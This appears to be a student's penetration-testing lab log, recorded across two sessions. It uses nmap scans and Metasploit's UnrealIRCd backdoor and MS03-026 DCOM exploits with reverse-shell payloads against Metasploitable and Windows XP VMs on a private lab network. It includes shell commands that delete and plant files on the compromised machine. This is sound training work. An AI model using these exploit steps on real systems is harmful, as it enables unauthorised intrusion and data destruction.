icon picker
pentest log

friday 19

re-imported kali VM (newest 2021 version may have different settings from 2020.4)
checked that all VM using NatNetwork
launched KaliVM and msVM
logged in to both VM
obtained IP addresses for both machinesusing igconfig msVM is 10.0.2.4 KaliVM is 10.0.2.15
pinged from KaliVM to msVM successfully
created target.txt file on msVM and inserted some text, saved the file in home directory
used touch and then nano editor
nmap
carried out nmap scan of target
└─$ nmap -v -A 10.0.2.4Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-19 06:45 EDTNSE: Loaded 153 scripts for scanning.NSE: Script Pre-scanning.Initiating NSE at 06:45Completed NSE at 06:45, 0.00s elapsedInitiating NSE at 06:45Completed NSE at 06:45, 0.00s elapsedInitiating NSE at 06:45Completed NSE at 06:45, 0.00s elapsedInitiating Ping Scan at 06:45Scanning 10.0.2.4 [2 ports]Completed Ping Scan at 06:45, 0.01s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 06:45Completed Parallel DNS resolution of 1 host. at 06:45, 0.02s elapsedInitiating Connect Scan at 06:45Scanning 10.0.2.4 [1000 ports]Discovered open port 445/tcp on 10.0.2.4Discovered open port 25/tcp on 10.0.2.4Discovered open port 5900/tcp on 10.0.2.4Discovered open port 3306/tcp on 10.0.2.4Discovered open port 139/tcp on 10.0.2.4Discovered open port 53/tcp on 10.0.2.4Discovered open port 21/tcp on 10.0.2.4Discovered open port 23/tcp on 10.0.2.4Discovered open port 80/tcp on 10.0.2.4Discovered open port 22/tcp on 10.0.2.4Discovered open port 111/tcp on 10.0.2.4Discovered open port 6667/tcp on 10.0.2.4Discovered open port 1524/tcp on 10.0.2.4Discovered open port 1099/tcp on 10.0.2.4Discovered open port 513/tcp on 10.0.2.4Discovered open port 2049/tcp on 10.0.2.4Discovered open port 512/tcp on 10.0.2.4Discovered open port 514/tcp on 10.0.2.4Discovered open port 5432/tcp on 10.0.2.4Discovered open port 8009/tcp on 10.0.2.4Discovered open port 2121/tcp on 10.0.2.4Discovered open port 6000/tcp on 10.0.2.4Discovered open port 8180/tcp on 10.0.2.4
zenmap not available
explore legion instead runs in sudo
legion allows session result to be saved to file
auto screenshots services such as web server home page, tomcat home page, db and ftp
list of cve vulnerabilities with hyperlink to cve database
setting up metasploit framework
/etc/init.d/postgresql startsudo msfdb initmsfconsole
find an exploit
search unrealircd> exploit/unix/irc/unreal_ircd_3281_backdoor
deploy exploit
use exploit/unix/irc/unreal_ircd_3281_backdoor
configure
set RHOST 10.0.2.4set LHOST 10.0.2.15show payloads>Compatible Payloads===================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) 1 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 2 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby).. 11 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
deliver payload
set payload cmd/unix/reverseexploit
explore target using shell
ifconfigwhoamipwdcd /cd homelscd msfadmincat target.txttouch hacked.txtrm target.txtls
finishing metasploitable session
ctrl + cquit

monday 22

Setting up Kali and Windows


Kali settings: internal network
image.png
Windows sp0: network
image.png
Secret file on Windows
image.png
TCP/IP properties for Windows
image.png
Kali Net settings(right click network icon in top right)
image.png
check for confirmation of network (manual setting for ip4)
Testing Kali - Windows network connection: ping
image.png

Hacking Windows from Kali

nmap scan needs sudo
sudo nmap -sN 10.0.2.0/24
image.png
port scanner
sudo nmap -PS 10.0.2.16 > [sudo] password for kali: Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:19 EDTNmap scan report for 10.0.2.16Host is up (0.00032s latency).Not shown: 994 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1025/tcp open NFS-or-IIS3389/tcp open ms-wbt-server5000/tcp open upnpMAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
fingerprint the target
└─$ sudo nmap -O -osscan-guess 10.0.2.16 1 ⚙Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:22 EDTNmap scan report for 10.0.2.16Host is up (0.00055s latency).Not shown: 994 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1025/tcp open NFS-or-IIS3389/tcp open ms-wbt-server5000/tcp open upnpMAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Microsoft Windows 2000|XPOS CPE: cpe:/o:microsoft:windows_2000::- cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_2000::sp2 cpe:/o:microsoft:windows_2000::sp3 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::- cpe:/o:microsoft:windows_xp::sp1OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
Vulnerability
Exploitation
msfconsole
search 'MS03-026'
use exploit/windows/dcerpc/ms03_026_dcom
show options
set rhost 10.0.2.16set lhost 10.0.2.15
show payloads(displays 183 items of different categories in a wide listing)
set payload windows/meterpreter/reverse_tcpexploit(session closes / dies, windows closes and restarts)


Want to print your doc?
This is not the way.
Try clicking the ⋯ next to your doc name or using a keyboard shortcut (
CtrlP
) instead.